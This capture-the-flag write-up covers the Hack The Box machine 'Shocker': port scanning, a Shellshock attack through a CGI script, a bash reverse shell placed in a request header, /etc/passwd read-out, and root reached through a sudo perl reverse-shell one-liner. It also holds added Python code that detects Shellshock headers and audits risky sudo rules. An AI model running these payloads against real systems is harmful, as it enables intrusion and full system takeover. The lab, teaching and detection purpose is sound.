Shocker
Port scan
root@kali:~/HTB/Machines/Shocker# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.56 --rate=1000

Starting masscan 1.0.5 at 2019-11-20 13:55:45 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.56
Discovered open port 2222/tcp on 10.10.10.56
nmap
root@kali:~/HTB/Machines/Shocker# nmap -A -T4 -v 10.10.10.56
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 08:56 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:56
Completed NSE at 08:56, 0.00s elapsed
Initiating NSE at 08:56
Completed NSE at 08:56, 0.00s elapsed
Initiating NSE at 08:56
Completed NSE at 08:56, 0.00s elapsed
Initiating Ping Scan at 08:56
Scanning 10.10.10.56 [4 ports]
Completed Ping Scan at 08:56, 0.10s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:56
Scanning shocker.htb (10.10.10.56) [1000 ports]
Discovered open port 80/tcp on 10.10.10.56
Discovered open port 2222/tcp on 10.10.10.56
Completed SYN Stealth Scan at 08:56, 0.73s elapsed (1000 total ports)
Initiating Service scan at 08:56
Scanning 2 services on shocker.htb (10.10.10.56)
Completed Service scan at 08:56, 6.10s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against shocker.htb (10.10.10.56)
Retrying OS detection (try #2) against shocker.htb (10.10.10.56)
Retrying OS detection (try #3) against shocker.htb (10.10.10.56)
adjust_timeouts2: packet supposedly had rtt of -359825 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -359825 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -859734 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -859734 microseconds.  Ignoring time.
Retrying OS detection (try #4) against shocker.htb (10.10.10.56)
adjust_timeouts2: packet supposedly had rtt of -82345 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -82345 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -282294 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -282294 microseconds.  Ignoring time.
Retrying OS detection (try #5) against shocker.htb (10.10.10.56)
adjust_timeouts2: packet supposedly had rtt of -561851 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -561851 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -561717 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -561717 microseconds.  Ignoring time.
Initiating Traceroute at 08:56
Completed Traceroute at 08:56, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 08:56
Completed Parallel DNS resolution of 2 hosts. at 08:56, 0.20s elapsed
NSE: Script scanning 10.10.10.56.
Initiating NSE at 08:56
Completed NSE at 08:56, 1.51s elapsed
Initiating NSE at 08:56
Completed NSE at 08:56, 0.18s elapsed
Initiating NSE at 08:56
Completed NSE at 08:56, 0.00s elapsed
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.044s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/20%OT=80%CT=1%CU=36010%PV=Y%DS=2%DC=T%G=Y%TM=5DD546
OS:15%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)SE
OS:Q(SP=107%GCD=1%ISR=10D%TI=Z%II=I%TS=8)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=I
OS:%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O
OS:5=M54DST11NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%TG=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)ECN(R=Y%DF=Y%T=40%W
OS:=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=
OS:Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%
OS:DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=
OS:AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%TG=40%CD
OS:=S)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.001 days (since Wed Nov 20 08:55:36 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT      ADDRESS
1   44.66 ms 10.10.14.1
2   44.79 ms shocker.htb (10.10.10.56)

NSE: Script Post-scanning.
Initiating NSE at 08:56
Completed NSE at 08:56, 0.00s elapsed
Initiating NSE at 08:56
Completed NSE at 08:56, 0.00s elapsed
Initiating NSE at 08:56
Completed NSE at 08:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.22 seconds
           Raw packets sent: 1163 (59.330KB) | Rcvd: 4165 (169.654KB)
Web
The page source doesn't give any hint.
root@kali:~/HTB/Machines/Shocker# curl http://shocker.htb/
<!DOCTYPE html>
<html>
<body>

<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">

</body>
</html>
Neither does the image: strings finds nothing of interest in it.
root@kali:~/HTB/Machines/Shocker# wget http://shocker.htb/bug.jpg
--2019-11-20 09:22:16--  http://shocker.htb/bug.jpg
Resolving shocker.htb (shocker.htb)... 10.10.10.56
Connecting to shocker.htb (shocker.htb)|10.10.10.56|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36861 (36K) [image/jpeg]
Saving to: ‘bug.jpg’

bug.jpg             100%[===================>]  36.00K  --.-KB/s    in 0.04s

2019-11-20 09:22:16 (820 KB/s) - ‘bug.jpg’ saved [36861/36861]

root@kali:~/HTB/Machines/Shocker# strings bug.jpg
Web enumeration
root@kali:~/HTB/Machines/Shocker# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt" -f -t 1000 -u http://10.10.10.56

  _|. _ _  _  _  _  _|_    v0.3.8
 (_||| _) (/_(_|| (_| )

Extensions: txt | HTTP method: get | Threads: 1000 | Wordlist size: 441041

Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-20_09-21-08.log

Target: http://10.10.10.56

[09:21:08] Starting:
[09:21:09] 403 -  294B - /cgi-bin/
[09:21:10] 403 -  292B - /icons/
[09:26:58] 403 -  300B - /server-status/

Task Completed
The cgi-bin folder returns 403 and is not listable, so we enumerate it too, this time with CGI-style extensions.
root@kali:~/HTB/Machines/Shocker# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "cgi,sh,pl,py" -f -t 1000 -u http://10.10.10.56/cgi-bin/

  _|. _ _  _  _  _  _|_    v0.3.8
 (_||| _) (/_(_|| (_| )

Extensions: cgi, sh, pl, py | HTTP method: get | Threads: 1000 | Wordlist size: 1102604

Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-20_09-27-37.log

Target: http://10.10.10.56/cgi-bin/

[09:27:37] Starting:
[09:27:39] 200 -  119B - /cgi-bin/user.sh

Task Completed
This CGI script returns the output of uptime.
root@kali:~/HTB/Machines/Shocker# curl http://shocker.htb/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script
 09:24:04 up  6:36,  0 users,  load average: 0.00, 0.00, 0.00
The name of the box, together with a shell script served from cgi-bin by Apache mod_cgi, suggests that we are facing a Shellshock vulnerability: bash importing a function definition, and whatever follows it, from an environment variable that the web server fills from a request header.
Exploit by script
root@kali:~/HTB/Machines/Shocker# searchsploit shellshock
------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                       |  Path
                                                                                     | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------- ----------------------------------------
Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metaspl | exploits/cgi/remote/38849.rb
Apache mod_cgi - 'Shellshock' Remote Command Injection                               | exploits/linux/remote/34900.py
Bash - 'Shellshock' Environment Variables Command Injection                          | exploits/linux/remote/34766.php
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)                        | exploits/cgi/webapps/34895.rb
Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)                    | exploits/hardware/remote/39568.py
GNU Bash - 'Shellshock' Environment Variable Command Injection                       | exploits/linux/remote/34765.txt
IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)       | exploits/cgi/remote/39918.rb
NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)                         | exploits/cgi/webapps/40213.txt
OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection                               | exploits/linux/remote/34879.txt
PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection  | exploits/php/webapps/35146.txt
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection                  | exploits/linux/remote/34896.py
RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection                | exploits/linux/local/40938.py
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Sh | exploits/cgi/webapps/39887.txt
TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command In | exploits/hardware/remote/40619.py
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)              | exploits/linux/remote/36933.py
------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
root@kali:~/HTB/Machines/Shocker# searchsploit -m 34900
  Exploit: Apache mod_cgi - 'Shellshock' Remote Command Injection
      URL: https://www.exploit-db.com/exploits/34900
     Path: /usr/share/exploitdb/exploits/linux/remote/34900.py
File Type: a /usr/bin/env python script, ASCII text executable, with CRLF line terminators

Copied to: /root/HTB/Machines/Shocker/34900.py

root@kali:~/HTB/Machines/Shocker# python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.34 lport=4444 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> whoami
shelly
Manual exploit
We can confirm the vulnerability by reading the /etc/passwd file through a crafted header:
root@kali:~/HTB/Machines/Shocker# curl -v http://shocker.htb/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Run a listener
root@kali:~/HTB/Machines/Shocker# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Launch the exploit
This time we place a bash reverse shell in the header of the request.
root@kali:~/HTB/Machines/Shocker# curl -v http://shocker.htb/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/bash -i >& /dev/tcp/10.10.14.34/4444 0>&1 "
*   Trying 10.10.10.56:80...
* TCP_NODELAY set
* Connected to shocker.htb (10.10.10.56) port 80 (#0)
> GET /cgi-bin/user.sh HTTP/1.1
> Host: shocker.htb
> User-Agent: curl/7.66.0
> Accept: */*
> custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/bash -i >& /dev/tcp/10.10.14.34/4444 0>&1
On the listener:
root@kali:~/HTB/Machines/Shocker# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.56.
Ncat: Connection from 10.10.10.56:33554.
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
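Both curl requests above work for the same reason: mod_cgi copies every request header into the CGI process environment, and a vulnerable bash then parses a value beginning with "() {" as a function definition and runs what follows it. The Python below is an added example and not part of the original writeup; it shows what a defender would do with that knowledge: flag the function-definition prefix in request headers (at a proxy or WAF, where all headers are visible) and in combined-format access-log lines (where only the request, referer and user-agent fields are recorded), and run the standard no-op import test against the local bash to see whether it is patched. The sample requests and log lines are constructed for illustration; the header value is the one used in the manual test above.

```python
"""Defensive checks for Shellshock-style function-import payloads.

Added example, not part of the original writeup. All sample requests and
log lines are constructed for illustration.
"""
import re
import shutil
import subprocess

# A Shellshock payload must begin with a bash function definition: "(",
# ")" and "{" with optional whitespace between them. The injected command
# follows the closing "}" and ";", so the prefix alone is the signal.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def is_shellshock_payload(value: str) -> bool:
    """True if a header/environment value carries the function-import prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_request_headers(headers: dict) -> list:
    """Names of headers whose value looks like a Shellshock payload.

    mod_cgi exports every request header as HTTP_<NAME>, so any header,
    not only User-Agent or a custom one, is a possible carrier.
    """
    return sorted(name for name, value in headers.items()
                  if is_shellshock_payload(value))


def scan_access_log(lines) -> list:
    """1-based numbers of combined-format log lines whose quoted fields
    (request line, referer, user-agent) contain the payload prefix."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        quoted = re.findall(r'"([^"]*)"', line)
        if any(is_shellshock_payload(q) for q in quoted):
            hits.append(lineno)
    return hits


def local_bash_vulnerable():
    """Run the standard import test against the local bash.

    Returns True if bash executed the trailing echo from the exported
    variable (vulnerable), False if it ignored it (patched), None if bash
    is not available. The exported value is a no-op function followed by
    an echo, so nothing harmful runs in either case.
    """
    bash = shutil.which("bash")
    if bash is None:
        return None
    try:
        out = subprocess.run(
            [bash, "-c", "echo test"],
            env={"PATH": "/usr/bin:/bin", "x": "() { :;}; echo vulnerable"},
            capture_output=True, text=True, timeout=10,
        ).stdout
    except OSError:
        return None
    return "vulnerable" in out


# Constructed sample requests: the header used in the manual test above,
# a benign request, and a benign header that merely contains braces.
SAMPLE_REQUESTS = {
    "shellshock": {
        "Host": "shocker.htb",
        "User-Agent": "curl/7.66.0",
        "custom": "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd",
    },
    "benign": {"Host": "shocker.htb", "User-Agent": "curl/7.66.0"},
    "braces_only": {"Host": "shocker.htb", "X-Note": "config = { a: 1 }"},
}

# Constructed combined-format access-log lines; the second carries the
# prefix in the user-agent field, the only default-logged header.
SAMPLE_LOG = [
    '10.10.14.34 - - [20/Nov/2019:09:24:04 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "curl/7.66.0"',
    '10.10.14.34 - - [20/Nov/2019:09:25:10 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "() { :;}; /bin/cat /etc/passwd"',
]

if __name__ == "__main__":
    for name, hdrs in SAMPLE_REQUESTS.items():
        print(f"{name:12s} -> suspicious headers: {scan_request_headers(hdrs)}")
    print("log lines flagged:", scan_access_log(SAMPLE_LOG))
    print("local bash vulnerable:", local_bash_vulnerable())
```

The header check is the one that matters for this box: a custom header such as the one used above never reaches the access log, so log review alone would have missed it. The local test is the same one the bash advisories published for the bug; a patched bash prints only "test".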
User flag
shelly@Shocker:/home/shelly$ cd /home
cd /home
shelly@Shocker:/home$ ls -l
ls -l
total 4
drwxr-xr-x 4 shelly shelly 4096 Sep 22  2017 shelly
shelly@Shocker:/home$ cd shelly
cd shelly
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
<USER_FLAG>
Root flag
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
Shelly can run perl as root through sudo without a password; since perl can execute arbitrary code, that is equivalent to a root shell.
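The sudo rule above is the whole privilege-escalation bug: a NOPASSWD rule on an interpreter is a root shell by another name, and the same holds for any shell, scripting language or editor that can spawn one. The Python below is an added example, not part of the original writeup, that a defender can run over the text of sudo -l to find such rules. It parses each (run-as, tag, command) entry and flags the ones that grant root (or ALL) a command from a list of interpreters and shells; that list is an assumption of this example and not exhaustive. The sample output is a constructed copy of what sudo -l prints for shelly above.

```python
"""Audit 'sudo -l' output for password-less access to interpreters.

Added example, not part of the original writeup. The sample text below is
a constructed copy of the shelly output shown in the writeup.
"""
import re
from dataclasses import dataclass

# Binaries that can execute arbitrary code or spawn a shell by design. A
# NOPASSWD rule for any of them, run as root, is equivalent to a root shell.
# This list is an assumption of the example, not an exhaustive catalogue.
INTERPRETERS_AND_SHELLS = {
    "perl", "python", "python2", "python3", "ruby", "php", "node", "lua",
    "sh", "bash", "dash", "zsh", "ksh", "vim", "vi", "less", "more", "awk",
}

# One command line of 'sudo -l' output, for example:
#     (root) NOPASSWD: /usr/bin/perl
#     (ALL : ALL) ALL
# Tags such as NOPASSWD: or NOEXEC: may be stacked before the command list.
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)+)?(?P<cmds>.+?)\s*$"
)


@dataclass
class SudoEntry:
    runas: str      # user part of the "(user : group)" specification
    nopasswd: bool  # True when the NOPASSWD: tag applies
    command: str    # a single command, or ALL


def parse_sudo_l(text: str) -> list:
    """Return the SudoEntry list found in 'sudo -l' output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # Defaults lines, headers and blank lines
        nopasswd = "NOPASSWD:" in (m.group("tags") or "")
        runas = m.group("runas").split(":")[0].strip()
        # Several commands may share one rule, separated by commas.
        for cmd in m.group("cmds").split(","):
            entries.append(SudoEntry(runas, nopasswd, cmd.strip()))
    return entries


def risky_entries(entries) -> list:
    """Entries that let the user run ALL, or an interpreter/shell, as root."""
    risky = []
    for e in entries:
        if e.runas not in ("root", "ALL"):
            continue
        binary = e.command.split()[0].rsplit("/", 1)[-1] if e.command else ""
        if e.command == "ALL" or binary in INTERPRETERS_AND_SHELLS:
            risky.append(e)
    return risky


# Constructed copy of the 'sudo -l' output shown for shelly above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
"""

if __name__ == "__main__":
    for e in risky_entries(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD " if e.nopasswd else ""
        print(f"RISKY: ({e.runas}) {tag}{e.command}")
```

The fix on the sudoers side is to grant the specific script or command that actually needs root, never the interpreter itself, and to keep the NOPASSWD tag off anything that can take arbitrary input.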
Open a second listener
root@kali:~/HTB/Machines/Shocker# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
From the shelly reverse shell
From shelly's reverse shell, we launch a perl reverse shell with sudo back to port 5555.
shelly@Shocker:/usr/lib/cgi-bin$ sudo perl -e 'use Socket;$i="10.10.14.34";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
<IN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
On the listener
root@kali:~/HTB/Machines/Shocker# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.56.
Ncat: Connection from 10.10.10.56:48420.
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# python
/bin/sh: 2: python: not found
# whereis python
python: /usr/bin/python3.5 /usr/bin/python3.5m /usr/lib/python3.5 /usr/lib/python2.7 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python
# /usr/bin/python3.5 -c 'import pty; pty.spawn("/bin/bash")'
root@Shocker:/usr/lib/cgi-bin# <CTRL-Z>
[1]+  Stopped                 rlwrap nc -lnvp 5555
root@kali:~/HTB/Machines/Shocker# stty rows 24 columns 80
root@kali:~/HTB/Machines/Shocker# stty raw -echo
root@kali:~/HTB/Machines/Shocker# fg
rlwrap nc -lnvp 5555
root@Shocker:/usr/lib/cgi-bin# export TERM=screen
export TERM=screen
root@Shocker:/usr/lib/cgi-bin# cat /root/root.txt
cat /root/root.txt
<ROOT FLAG>
References
Daniel Simao 18:03, 21 November 2019 (EST)